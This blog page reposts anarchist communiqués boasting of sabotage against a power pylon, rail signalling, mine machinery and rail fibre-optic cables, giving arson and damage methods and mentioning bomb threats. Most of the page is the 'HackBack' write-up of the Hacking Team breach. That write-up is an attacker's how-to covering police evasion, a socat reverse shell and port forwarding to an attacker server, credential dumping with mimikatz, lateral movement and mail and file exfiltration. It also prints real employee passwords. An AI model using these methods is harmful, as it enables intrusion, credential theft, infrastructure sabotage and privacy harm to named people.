All posts by warriorupthrowdown

France- High Voltage pylon bends with wrenches and hacksaws

(Technical details are in bold.)

Video here 

Dear Messieurs L. Prentout, P.Remy, and PL.Jacob and A.Colrat

One night, not long ago, we observed a curious phenomenon that I’d like to share with you. Near Saint-Martin d’Aubigny a garland of little fireflies and several pairs of gloved hands were happily busy in our charming countryside. The hacksaws howled while monkey wrenches sang in the quiet night that the humming of your new THT has not interfered with yet. [Note by Warrior Up: this seems to imply that the pylons weren’t ‘live’ yet at the time of sabotage.]

Despite all the precautions you have taken, it seems that the services that seemed to be very busy recently, monitoring our homes, controlling our cars and all those delightful activities that you hold the secret of, were not able to enjoy this magical spectacle, let alone prevent it.

I assure you, dear gentlemen, that I had my glasses on and I was walking straight. Besides, the next day I was able to see that I hadn’t been dreaming. Large metal bars had taken elegant curves and the grasslands were scattered with bolts, as though Santa’s sleigh had crashed into your great iron towers. Because I guess it’s definitely gifts, albeit a little early, that were being prepared for you by these small hands that were taking care not leave you unsatisfied. And it seems that these little fireflies have become expert in the art of giving you such presents.

You will agree, dear sirs, admiring this spectacle, that your great work would be more charming if all the pylons of Cotentin-Maine started to look like that one. Hoping that public money will not be used to adjust such work and that from Flamanville to Beaulion-sur-Oudon, we can still enjoy the show of bars squealing and ballets of fireflies flitting around your 420 “EiffelTowers”.

 Sincere sawlutations!

 An admirer of aspiring artists

note:
RTE, Reseau Transport Electrique – the “infrastructure” arm of EDF tasked with transporting electricity via pylons carrying power generated at nuclear power plant at Flamanville.

From Act for freedom now

Finland: rail security electronics installation burned

(Technical details are in bold.)

With this communiqué we claim responsibility for the railway sabotage directed at a rail security electronics installation at Rekola in Vantaa. For this action we only needed a crowbar, some toilet paper, a few canisters of gasoline and a light. We broke in through the door and used toilet paper soaked in lighter fluid as a fuse, so we could flee the scene in peace before the arrival of the police and the fire department.

The decision to take action again was aided by the mass media’s response to the communiqué that was sent to the takku.net site on June 6th, claiming numerous instances of sabotage over the last few months. The media’s outrageous accusations toward the comrades in Social Center Satama and the mixing up of the Roma migrants to these actions only displays what kind of scum we are dealing with. You can blame yourselves for the latest action.

The representatives of the media left the anarchist prisoners all over the world (and especially in the nine states we phoned in bomb threats to on June 6th), for whom the actions were also carried out in solidarity to – as well as to the Roma people and Social Center Satama, completely uncovered. As long as the situation of our comrades is not brought to light, we will strike against targets that are relevant to capital and the state.

Attacks on the railway network are as old as the anarchist movement itself. We are proud to continue the legacy of rebellious anarchy in our localities and we do so with confidence and a readiness to confront the possible consequences.

We once again send our subversive greetings to our comrades in Social Center Satama, the Roma migrants in Helsinki and anarchist prisoners all over the world. You are not alone!

We send warm greetings to our chilean comrade Luciano Pitronello Schuffeneger, who was seriously injured when a bomb prematurely exploded outside a bank in Santiago de Chile. We also send greetings to the United States to Marie Mason, Eric McDavid, Grant Barnes and the other ecoanarchist prisoners on the international day of solidarity of June 11th.

Fire to the prisons!

To spread the rebellion everywhere – direct action and solidarity!

From Act for freedom now

Arson and sabotage at hambach mine

(Technical details are in bold.)

This new years night while everybody was celebrating, we had a special party of our own, visiting the hambach opencast mine and putting on a nice fireworks display for RWE and breaking some glass for a lucky new fear.

After wandering along the railway tracks which transport brown coal from the mine to nearby power stations, we came across two signal boxes and a bundle of cables and thought these were perfectly suitable targets for our mischevious intentions.

We opened the boxes with a wide chisel and placed inside 10cm lengths of inner tube stuffed with gasoline soaked cloths then smeared the inside of the boxes with burning gel to make sure it all burnt properly.

We thought the party was over, but then on the way back we noticed some welcoming lights from an office trailer in a fenced compound. Next to the trailer were two parked diggers in dire need of maintainance, we checked the trailer was empty by smashing its windows, then cut the fence and set about immediately improving the air conditioning of the diggers, smashing their windows, cutting all of the hydraulics and adding some extra holes to the coolers. We also poured some dirt and broken glass in the gas tanks and used a bolt cutter to cut the valves of the trailers tires.

200m further, we found a front-end loader and gave it the same treatment aswell as emptying the fire extinguisher found inside the cab into its gas tank.

According to the media reports all of this caused a damage of “tens of thousands” of euros, making it our most expensive new years party so far.

We wish to send our thanks to all the people who provided us with perfect soundcover by wasting huge amounts of explosives and terrifying the local wildlife in a stupid capitalist ritual.

– Criminal Mechanics Party

From Act for freedom now

Bologna, Italy: High-speed railway sabotage by fire to fiber-optic cables

Enlarge photo for the location of the cables.

(Technical details are in bold.)

In the night between 7th and 8th November we sabotaged the high speed railway lines Bologna-Milano, Bologna-Piacenza and Bologna-Verona by putting fire to the bundles of optical fibres running in the conduits parallel to the railway, and in this way we caused significant delays to the railway traffic in the Bologna hub.

A Northern League’s national demo was to take place on 8th November in Bologna, and we thought it right to do something to hamper it at the very least. By sabotaging the railway lines we tried to obstruct or at least slow down the Norther League guys’ coming, as they would travel by train, and to make the cops’ job more difficult after they had armoured up the city in order to defend these guys.

We didn’t want everything to go according to the plans of those who militarized the streets.

We decided to carry out this action on the eve of the Northern League rally; however we want to point out that Salvini [the Northern League leader] and the racists who follow him are but one of the many expressions of the same system, a system rotten and unjust to the roots, and for this reason it must be only destroyed. One of the ways to begin with can be to jam it, block it, and it is not necessary to comply with imposed deadlines as one can act also by setting one’s own time.

There exist so many possibilities in spite of the constant progress in control and repression technologies.

Precisely because the system is becoming increasingly complex and pervasive, it needs certain infrastructures that cannot be constantly controlled and have quite delicate points.

To identify them and hit at them is not impossible, what is needed is some reasoning and at times also simple rags soaked in common petrol.

From Act for freedom now

Part 2

From the local media we learn that in the night between 19th and 20th May, copper and fibre optic cables were cut along the high speed rail track in Bologna, and two cockpits were set on fire. In the area graffiti NO TAV were left.

From the press we learn that over 40 high speed trains were delayed up to 30 minutes, and consequently also a dozen local trains were delayed.

From Act for freedom now

HackBack 2

From PasteBin (where it has better formatting)

–[ 1 – Introduction ]———————————————————-

You’ll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there’s plenty of hackers better than me,
but they misuse their talents working for “defense” contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics – the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.

You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: “Let’s take a step forward with
new forms of struggle” [5]. Hacking is a powerful tool, let’s learn and fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

–[ 2 – Hacking Team ]———————————————————-

Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan “boia chi molla”. It’d be more correct to say “boia chi vende
RCS”. They also claimed to have technology to solve the “problem” posed by Tor
and the darknet [13]. But seeing as I’m still free, I have my doubts about
its effectiveness.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

–[ 3 – Stay safe out there ]—————————————————

Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:

1) Encrypt your hard disk [2]

I guess when the police arrive to seize your computer, it means you’ve
already made a lot of mistakes, but it’s better to be safe.

2) Use a virtual machine with all traffic routed through Tor

This accomplishes two things. First, all your traffic is anonymized through
Tor. Second, keeping your personal life and your hacking on separate
computers helps you not to mix them by accident.

You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
something custom [6]. Here’s [7] a detailed comparison.

3) (Optional) Don’t connect directly to Tor

Tor isn’t a panacea. They can correlate the times you’re connected to Tor
with the times your hacker handle is active. Also, there have been
successful attacks against Tor [8]. You can connect to Tor using other
peoples’ wifi. Wifislax [9] is a linux distro with a lot of tools for
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
before Tor, but that’s less secure because they can still correlate the
hacker’s activity with your house’s internet activity (this was used as
evidence against Jeremy Hammond [11]).

The reality is that while Tor isn’t perfect, it works quite well. When I
was young and reckless, I did plenty of stuff without any protection (I’m
referring to hacking) apart from Tor, that the police tried their hardest
to investigate, and I’ve never had any problems.

[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html

—-[ 3.1 – Infrastructure ]—————————————————-

I don’t hack directly from Tor exit nodes. They’re on blacklists, they’re
slow, and they can’t receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:

1) Domain Names

For C&C addresses, and for DNS tunnels for guaranteed egress.

2) Stable Servers

For use as C&C servers, to receive connect-back shells, to launch attacks,
and to store the loot.

3) Hacked Servers

For use as pivots to hide the IP addresses of the stable servers. And for
when I want a fast connection without pivoting, for example to scan ports,
scan the whole internet, download a database with sqli, etc.

Obviously, you have to use an anonymous payment method, like bitcoin (if it’s
used carefully).

—-[ 3.2 – Attribution ]——————————————————-

In the news we often see attacks traced back to government-backed hacking
groups (“APTs”), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They’re negligent because they can hack without legal consequences.

I didn’t want to make the police’s work any easier by relating my hack of
Hacking Team with other hacks I’ve done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.

–[ 4 – Information Gathering ]————————————————-

Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.

—-[ 4.1 – Technical Information ]———————————————

Some tools and techniques are:

1) Google

A lot of interesting things can be found with a few well-chosen search
queries. For example, the identity of DPR [1]. The bible of Google hacking
is the book “Google Hacking for Penetration Testers”. You can find a short
summary in Spanish at [2].

2) Subdomain Enumeration

Often, a company’s main website is hosted by a third party, and you’ll find
the company’s actual IP range thanks to subdomains like mx.company.com or
ns1.company.com. Also, sometimes there are things that shouldn’t be exposed
in “hidden” subdomains. Useful tools for discovering domains and subdomains
are fierce [3], theHarvester [4], and recon-ng [5].

3) Whois lookups and reverse lookups

With a reverse lookup using the whois information from a domain or IP range
of a company, you can find other domains and IP ranges. As far as I know,
there’s no free way to do reverse lookups aside from a google “hack”:

“via della moscova 13” site:www.findip-address.com
“via della moscova 13” site:domaintools.com

4) Port scanning and fingerprinting

Unlike the other techniques, this talks to the company’s servers. I
include it in this section because it’s not an attack, it’s just
information gathering. The company’s IDS might generate an alert, but you
don’t have to worry since the whole internet is being scanned constantly.

For scanning, nmap [6] is precise, and can fingerprint the majority of
services discovered. For companies with very large IP ranges, zmap [7] or
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
sites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/

—-[ 4.2 – Social Information ]————————————————

For social engineering, it’s useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:

1) Google

Here as well, it’s the most useful tool.

2) theHarvester and recon-ng

I already mentioned them in the previous section, but they have a lot more
functionality. They can find a lot of information quickly and
automatically. It’s worth reading all their documentation.

3) LinkedIn

A lot of information about the employees can be found here. The company’s
recruiters are the most likely to accept your connection requests.

4) Data.com

Previously known as jigsaw. They have contact information for many
employees.

5) File Metadata

A lot of information about employees and their systems can be found in
metadata of files the company has published. Useful tools for finding
files on the company’s website and extracting the metadata are metagoofil
[1] and FOCA [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html

–[ 5 – Entering the network ]————————————————–

There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I’ll
talk a little about the two most common ways, which I recommend trying first.

—-[ 5.1 – Social Engineering ]————————————————

Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, “Targeted Attacks”). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn’t want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they’d be much more
likely to recognize and investigate a spear phishing attempt.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

—-[ 5.2 – Buying Access ]—————————————————–

Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it’s employees are infosec experts, so there was a low chance that they’d
already been compromised.

—-[ 5.3 – Technical Exploitation ]——————————————–

After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum: 93.62.139.32 – 93.62.139.47
descr: HT public subnet

Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn’t find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven’t been patched, I won’t give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

–[ 6 – Be Prepared ]———————————————————–

I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.

The post-exploitation tools that I’d prepared were:

1) busybox

For all the standard Unix utilities that the system didn’t have.

2) nmap

To scan and fingerprint Hacking Team’s internal network.

3) Responder.py

The most useful tool for attacking windows networks when you have access to
the internal network, but no domain user.

4) Python

To execute Responder.py

5) tcpdump

For sniffing traffic.

6) dsniff

For sniffing passwords from plaintext protocols like ftp, and for
arpspoofing. I wanted to use ettercap, written by Hacking Team’s own ALoR
and NaGA, but it was hard to compile it for the system.

7) socat

For a comfortable shell with a pty:
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
hacked box: socat exec:’bash -li’,pty,stderr,setsid,sigint,sane \
tcp:my_server:my_port

And useful for a lot more, it’s a networking swiss army knife. See the
examples section of its documentation.

8) screen

Like the shell with pty, it wasn’t really necessary, but I wanted to feel
at home in Hacking Team’s network.

9) a SOCKS proxy server

To use with proxychains to be able to access their local network from any
program.

10) tgcd

For forwarding ports, like for the SOCKS server, through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/

The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team’s network.

–[ 7 – Watch and Listen ]——————————————————

Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.

–[ 8 – NoSQL Databases ]——————————————————-

NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they’d finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team’s
internal network:

27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072

|_ version = 2.6.5

27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases

|_ version = 2.6.5

They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/

–[ 9 – Crossed Cables ]——————————————————–

Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn’t very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork 192.168.1.200/24:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)

3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:ht-synology.name
| Address: 192.168.200.66:3260,0
|_ Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)

3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
|_ Authentication: No authentication required

iSCSI needs a kernel module, and it would’ve been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1

The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT –to-destination 127.0.0.1

And now, after:
iscsiadm -m node –targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 –login

…the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big too download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

…and finally we’ve unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf

–[ 10 – From backups to domain admin ]—————————————–

What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:

_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!………..

I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient ‘//192.168.100.51/c$’ -U ‘hackingteam.local/besadmin%bes32678!!!’

It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit’s psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran “load kiwi” [5], “creds_wdigest”, and
got a bunch of passwords, including the Domain Admin:

HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <—- lol great sysadmin
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz

–[ 11 – Downloading the mail ]————————————————-

With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there’s a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell’s date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge ’05/06/2015′) -or (Sent -ge ’05/06/2015′)}

with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can’t have a month above 12). It seems like Microsoft’s engineers only
test their software with their own locale.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/

–[ 12 – Downloading Files ]—————————————————-

Now that I’d gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:

proxychains smbclient ‘//192.168.1.230/FAE DiskStation’ \
-U ‘HACKINGTEAM/Administrator%uu8dd8ndd12!’ -Tc FAE_DiskStation.tar ‘*’

I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.

–[ 13 – Introduction to hacking windows domains ]——————————

Before continuing with the story of the “weones culiaos” (Hacking Team), I
should give some general knowledge for hacking windows networks.

—-[ 13.1 – Lateral Movement ]————————————————-

I’ll give a brief review of the different techniques for spreading withing a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for “in place” movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1

Remote Movement:

1) psexec

The tried and true method for lateral movement on windows. You can use
psexec [1], winexe [2], metasploit’s psexec_psh [3], Powershell Empire’s
invoke_psexec [4], or the builtin windows command “sc” [5]. For the
metasploit module, powershell empire, and pth-winexe [6], you just need the
hash, not the password. It’s the most universal method (it works on any
windows computer with port 445 open), but it’s also the least stealthy.
Event type 7045 “Service Control Manager” will appear in the event logs. In
my experience, no one has ever noticed during a hack, but it helps the
investigators piece together what the hacker did afterwards.

2) WMI

The most stealthy method. The WMI service is enabled on all windows
computers, but except for servers, the firewall blocks it by default. You
can use wmiexec.py [7], pth-wmis [6] (here’s a demonstration of wmiexec and
pth-wmis [8]), Powershell Empire’s invoke_wmi [9], or the windows builtin
wmic [5]. All except wmic just need the hash.

3) PSRemoting [10]

It’s disabled by default, and I don’t recommend enabling new protocols.
But, if the sysadmin has already enabled it, it’s very convenient,
especially if you use powershell for everything (and you should use
powershell for almost everything, it will change [11] with powershell 5 and
windows 10, but for now powershell makes it easy to do everything in RAM,
avoid AV, and leave a small footprint)

4) Scheduled Tasks

You can execute remote programs with at and schtasks [5]. It works in the
same situations where you could use psexec, and it also leaves a well known
footprint [12].

5) GPO

If all those protocols are disabled or blocked by the firewall, once you’re
Domain Admin, you can use GPO to give users a login script, install an msi,
execute a scheduled task [13], or, like we’ll see with the computer of
Mauro Romeo (one of Hacking Team’s sysadmins), use GPO to enable WMI and
open the firewall.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py

“In place” Movement:

1) Token Stealing

Once you have admin access on a computer, you can use the tokens of the
other users to access resources in the domain. Two tools for doing this are
incognito [1] and the mimikatz token::* commands [2].

2) MS14-068

You can take advantage of a validation bug in Kerberos to generate Domain
Admin tickets [3][4][5].

3) Pass the Hash

If you have a user’s hash, but they’re not logged in, you can use
sekurlsa::pth [2] to get a ticket for the user.

4) Process Injection

Any RAT can inject itself into other processes. For example, the migrate
command in meterpreter and pupy [6], or the psinject [7] command in
powershell empire. You can inject into the process that has the token you
want.

5) runas

This is sometimes very useful since it doesn’t require admin privileges.
The command is part of windows, but if you don’t have a GUI you can use
powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

—-[ 13.2 – Persistence ]——————————————————

Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn’t needed since companies never
sleep. I always use Duqu 2 style “persistence”, executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it’s not needed and it increases the risk of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/

—-[ 13.3 – Internal reconnaissance ]——————————————

